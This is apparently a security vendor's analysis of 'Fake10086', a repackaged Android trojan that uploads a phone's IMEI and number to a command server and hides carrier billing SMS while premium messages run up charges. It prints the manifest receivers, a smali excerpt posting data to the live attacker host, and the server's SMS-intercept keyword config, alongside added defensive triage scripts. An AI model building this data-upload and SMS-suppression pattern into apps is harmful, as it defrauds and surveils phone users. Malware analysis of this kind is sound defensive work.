Update:

  • At least two instances have been found: one inside a pirated version of the third-party China Mobile helper app, and one inside a pirated hotel reservation app. Both were found on Chinese local sites.

--

    10086 is the customer service portal for China Mobile users; they can reach the service via web page, SMS, or phone call. A third party published an Android application called chinamobile100 that helps users use SMS (free in most cases) to query their bill and GPRS traffic volume, turn roaming on and off, and so on.

 

    However, we found repackaged versions being distributed on Chinese local websites; we named this family "Fake10086". The malware maker or distributor claimed their version was beautified, or offered a 2 RMB bill discount, to bait users into installing it. The incident came to our attention because some users posted complaints in forums about losing 2 RMB to 4 RMB, or about being unable to receive the query result from 10086 when sending the request by SMS manually. Note that, based on the current analysis, this trojan only affects users in China.

    It modifies AndroidManifest.xml to register several receivers that react to the events below:

    <receiver android:name="com.mms.bg.transaction.SmsReceiver">
        <intent-filter>
            <action android:name="com.android.mms.transaction.MESSAGE_SENT" />
            <data android:scheme="content" />
        </intent-filter>
        <intent-filter>
            <action android:name="android.intent.action.SEND_MESSAGE" />
        </intent-filter>
    </receiver>
    <receiver android:name="com.mms.bg.transaction.PrivilegedSmsReceiver" android:permission="android.permission.BROADCAST_SMS">
        <intent-filter android:priority="1000">
            <action android:name="android.provider.Telephony.SMS_RECEIVED" />
        </intent-filter>
    </receiver>
    <receiver android:name="com.mms.bg.ui.BootReceiver">
        <intent-filter>
            <action android:name="android.intent.action.BOOT_COMPLETED" />
        </intent-filter>
    </receiver>
    <receiver android:name="com.mms.bg.ui.AutoSMSRecevier">
        <intent-filter>
            <action android:name="com.mms.bg.SMS" />
        </intent-filter>
    </receiver>
    <receiver android:name="com.mms.bg.ui.InternetStatusReceiver">
        <intent-filter>
            <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
        </intent-filter>
    </receiver>

Listing 1:  AndroidManifest.xml


    It also changes the first launch point (the launcher activity) and the requested permissions:

    <activity android:theme="@android:style/Theme.NoTitleBar.Fullscreen" android:label="@string/app_name" android:name="com.mms.bg.ui.FakeLanucherActivity">
        <intent-filter>
            <action android:name="android.intent.action.MAIN" />
            <category android:name="android.intent.category.LAUNCHER" />
            <category android:name="android.intent.category.DEFAULT" />
        </intent-filter>
    </activity>


      <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
      <uses-permission android:name="android.permission.RECEIVE_SMS" />
      <uses-permission android:name="android.permission.SEND_SMS" />
      <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
      <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
      <uses-permission android:name="android.permission.READ_PHONE_STATE" />
      <uses-permission android:name="android.permission.WAKE_LOCK" />
      <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
      <uses-permission android:name="android.permission.INTERNET" />

Listing 2:  AndroidManifest.xml (cont.)
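As an added example (not AegisLab's tooling), the following static triage script flags the manifest indicators described above: the RECEIVE_SMS + SEND_SMS permission pair, an SMS_RECEIVED receiver with a near-maximum priority, and a BOOT_COMPLETED receiver. The sample manifest is constructed from Listings 1 and 2 and wrapped in an assumed <manifest> root with the standard android namespace declaration, which is not shown on the page.

```python
# Added example (not AegisLab's tooling): static triage of an AndroidManifest.xml.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

def attr(elem, name):
    """Read an android:-namespaced attribute such as android:name."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))

def triage_manifest(xml_text):
    """Return a list of human-readable findings for the given manifest."""
    root = ET.fromstring(xml_text)
    findings = []
    perms = {attr(p, "name") for p in root.iter("uses-permission")}
    if {"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"} <= perms:
        findings.append("RECEIVE_SMS and SEND_SMS both requested")
    for recv in root.iter("receiver"):
        for intf in recv.findall("intent-filter"):
            actions = {attr(a, "name") for a in intf.findall("action")}
            prio = int(attr(intf, "priority") or 0)
            # A priority near the maximum lets the receiver see (and abort) an
            # incoming SMS broadcast before the stock messaging app does.
            if "android.provider.Telephony.SMS_RECEIVED" in actions and prio >= 999:
                findings.append("SMS_RECEIVED receiver %s with priority %d"
                                % (attr(recv, "name"), prio))
            if "android.intent.action.BOOT_COMPLETED" in actions:
                findings.append("BOOT_COMPLETED receiver %s" % attr(recv, "name"))
    return findings

# Constructed sample: the receivers and permissions quoted in Listings 1 and 2,
# wrapped in a minimal <manifest> root (assumed; the root is not on the page).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
  <uses-permission android:name="android.permission.RECEIVE_SMS" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <application>
    <receiver android:name="com.mms.bg.transaction.PrivilegedSmsReceiver" android:permission="android.permission.BROADCAST_SMS">
      <intent-filter android:priority="1000">
        <action android:name="android.provider.Telephony.SMS_RECEIVED" />
      </intent-filter>
    </receiver>
    <receiver android:name="com.mms.bg.ui.BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED" />
      </intent-filter>
    </receiver>
  </application>
</manifest>"""
```

Run `triage_manifest(SAMPLE_MANIFEST)` to get the three findings for this sample; on a clean app the permission pair alone is not proof of abuse, so treat each finding as a triage lead rather than a verdict.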


    If we trigger the BOOT_COMPLETED event by rebooting the phone, we can observe that a service, BgService, is launched:

Figure 1: Log output from DDMS.


    The trojan stores personal information such as the IMEI, phone number and SMSC, together with other usage information, in /data/data/com.hotel/files/.hide/upload.xml:

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
  <body>
    <imei>354059022277352</imei>
    <version>1.0.1</version>
    <smscenter>8613800100500</smscenter>
    <first>1</first>
    <handled>0</handled>
    <pid>20013</pid>
    <installtime>3 Mar 2011 09:13:38 GMT</installtime>
    <sysversion>7</sysversion>
    <auth>michael</auth>
    <fare>0</fare>
    <phonenum>+886928216512</phonenum>
    <reason>simLoaded</reason>
  </body>

 Listing 3:  upload.xml

 

    It then uploads this file via HttpPost/HttpClient to http://www.youlubg.com:81/Coop/request3.php:

  new-instance v8, Ljava/net/URI;
  const-string v9, "http://www.youlubg.com:81/Coop/request3.php"
  invoke-direct {v8, v9}, Ljava/net/URI;-><init>(Ljava/lang/String;)V
  invoke-virtual {v6, v8}, Lorg/apache/http/client/methods/HttpPost;->setURI(Ljava/net/URI;)V
  ...
  invoke-interface {v5, v6}, Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;

 Listing 4:  ...\com\mms\bg\ui\SettingManager.smali

    The server later responds with a serverInfo.xml:

<?xml version="1.0" encoding="UTF-8" ?>
  <body>
    <auto_run>1</auto_run>
    <auto_link_time>24</auto_link_time>
    <version>1.0.1</version>
    <channel>
      <channel_name>vedio</channel_name>
      <vedio_url>http://211.136.165.53/wl/rmw1s/pp66.jsp</vedio_url>
      <channel_sms>2</channel_sms>
      <intercept_key>
        <key>移动</key>
        <key>费用</key>
        <key>1元</key>
        <key>2元</key>
      </intercept_key>
      <intercept_time>2000</intercept_time>
      <limit_nums_day>4</limit_nums_day>
      <limit_nums_month>4</limit_nums_month>
    </channel>
  </body>

Listing 5: serverInfo.xml
 

    Here the filter keywords 移动/费用/1元/2元 ("Mobile", "fee", "1 yuan", "2 yuan") are stored so that SMS notifications sent by the carrier (China Mobile) can be intercepted; the user therefore never becomes aware of the subscription and cannot contact the service desk to cancel it.
The response also carries a URL, http://211.136.165.53/wl/rmw1s/pp66.jsp; after googling, it appears to have been a free video service that ended on 2011-02-28. The server is not responding at the time of this writing.
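As an added example (not AegisLab's code), the following parser turns a captured serverInfo.xml into a structured summary of the intercept policy, and reports which of the configured keywords a given incoming SMS contains, so an analyst can tell a victim which carrier notifications the trojan would have hidden. The element names follow Listing 5; the carrier notice used as input is constructed for the example and is not from the page.

```python
# Added example (not AegisLab's code): extract the intercept policy from a
# captured serverInfo.xml so an analyst can see what the trojan will hide.
import xml.etree.ElementTree as ET

def parse_server_info(xml_text):
    """Turn the C2 response into a dict; element names follow Listing 5."""
    root = ET.fromstring(xml_text)
    ch = root.find("channel")
    return {
        "auto_run": root.findtext("auto_run") == "1",
        "auto_link_time": int(root.findtext("auto_link_time")),
        "version": root.findtext("version"),
        "channel_name": ch.findtext("channel_name"),
        "channel_url": ch.findtext("vedio_url"),
        "channel_sms": int(ch.findtext("channel_sms")),
        "intercept_keys": [k.text for k in ch.find("intercept_key").findall("key")],
        "intercept_time": int(ch.findtext("intercept_time")),
        "limit_nums_day": int(ch.findtext("limit_nums_day")),
        "limit_nums_month": int(ch.findtext("limit_nums_month")),
    }

def matching_keys(config, sms_text):
    """Keywords of the config found in an incoming SMS; any match means the
    carrier notification would be suppressed before the user sees it."""
    return [k for k in config["intercept_keys"] if k in sms_text]

# Copy of the captured response in Listing 5, used as sample input.
SERVER_INFO = """<body>
  <auto_run>1</auto_run>
  <auto_link_time>24</auto_link_time>
  <version>1.0.1</version>
  <channel>
    <channel_name>vedio</channel_name>
    <vedio_url>http://211.136.165.53/wl/rmw1s/pp66.jsp</vedio_url>
    <channel_sms>2</channel_sms>
    <intercept_key>
      <key>移动</key><key>费用</key><key>1元</key><key>2元</key>
    </intercept_key>
    <intercept_time>2000</intercept_time>
    <limit_nums_day>4</limit_nums_day>
    <limit_nums_month>4</limit_nums_month>
  </channel>
</body>"""

# Constructed carrier notice (not from the page) and an unrelated message.
CARRIER_NOTICE = "【中国移动】您已成功订购视频服务，费用2元/月。"
PLAIN_MESSAGE = "明天下午三点见。"
```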

    So far we can confirm that it indeed uploads the user's private data to a remote server and receives a command-like XML in return. We also saw complaints on Chinese forums about SMS being sent, without the user's awareness, to 10086901 for an unwanted service, which can lead to a high phone bill as well. We will update our analysis once we have further information.

   Added on 2011-03-11: Fortinet has published an in-depth, step-by-step analysis of how the code blocks SMS; see http://blog.fortinet.com/how-androidfake10086-selectively-blocks-sms-step-by-step/

By AegisLab

Analyzer: Aaron Li.